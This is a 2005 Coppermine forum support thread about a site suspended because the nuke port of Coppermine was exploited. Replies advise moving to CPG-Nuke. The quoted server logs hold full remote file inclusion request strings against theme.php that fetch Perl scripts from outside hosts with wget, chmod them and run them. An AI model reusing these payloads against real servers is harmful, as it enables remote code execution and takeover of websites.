forum.coppermine-gallery.net
Support => Older/other versions => cpg1.2 PHPnuke/Postnuke Support => Topic started by: mrmike987 on July 07, 2005, 12:46:29 am
-
gogclan.com on Server 102 was suspended for
Website Exploit - Coppermine is being exploited, and has been over the past couple of weeks.
Location of Documentation Logs:
Yes, see notes below
Comments added in WHM:
Yes.
Was Client Notified:
Yes, through this suspension.
Any additional notes:
gogclan.com:200.164.108.163 - - [30/Jun/2005:16:40:47 -0400] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://newton.100free.com/newcmd.gif?&cmd=cd%20/tmp;wget%20www.bo0mber.oi.com.br/bd.pl HTTP/1.0" 200 12891 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
gogclan.com:200.210.219.171 - - [02/Jul/2005:03:12:49 -0400] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://psc.yoll.net/cmd?&cmd=cd%20/var/tmp;%20GET%20http://geocities.yahoo.com.br/wdteam/beto.txt%20>%20beto.txt;%20chmod%20777%20beto.txtl;%20perl%20beto.txt HTTP/1.0" 200 14798 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.40607)"
gogclan.com:200.165.181.247 - - [06/Jul/2005:15:08:28 -0400] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://mi.verizon.net.do/carlos18/tool25.dot?&cmd=cd%20/tmp;wget%20www.bo0mber.oi.com.br/bd.pl HTTP/1.1" 200 12936 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
-
There is no support for the nuke port of Coppermine. If you want Coppermine with nuke, you have to use CPG-Nuke. A google search for coppermine nuke exploit turned up a link to cpgnuke anyway:
http://www.cpgnuke.com/Forums/viewtopic/t=3580.html
The standalone version has no known security holes. Switch to CPG-Nuke if you want to continue using Coppermine with nuke.
-
searching before posting would have helped as well: http://forum.coppermine-gallery.net/index.php?topic=5879.0